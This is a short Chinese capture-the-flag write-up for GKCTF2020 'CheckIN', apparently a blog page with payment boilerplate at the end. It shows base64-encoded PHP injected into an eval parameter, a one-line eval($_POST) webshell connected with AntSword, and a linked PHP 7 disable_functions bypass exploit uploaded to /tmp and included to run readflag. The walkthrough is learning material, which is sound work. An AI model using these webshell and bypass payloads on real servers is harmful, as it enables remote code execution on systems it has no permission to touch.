[GKCTF2020]CheckIN -wp

在这里插入图片描述向Ginkgo传参,后面还有eval函数,先传个phpinfo(); 试试,要传base64编码后的。

在这里插入图片描述发现没有问题,发现一大堆被禁的函数,php版本为7.3。
接下来看看能不能穿一句话上去
eval($_POST[‘ccc’]);
?Ginkgo=ZXZhbCgkX1BPU1RbJ2NjYyddKTs=

然后用蚁剑连接
在这里插入图片描述可以看到flag和readflag;
权限不够无法打开flag,readflag打开也是一堆乱码。
这种情况一般就是通过执行readflag来获取flag。
接下来就要结合7.3版本,readflag,想到
bypass disable_functions,该漏洞可以触发命令执行
大佬给出的exp:
https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php

在这里插入图片描述修改一下exp的执行目标,通过蚁剑上传至tmp目录下(因为这目录的权限较高)

在这里插入图片描述上传成功后在页面里包含文件即可获得flag,
?Ginkgo=include(’/tmp/test.php’);
?Ginkgo=aW5jbHVkZSgnL3RtcC90ZXN0LnBocCcpOw==

在这里插入图片描述
注:(文章为本人参考他人wp复现,学习思路)

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值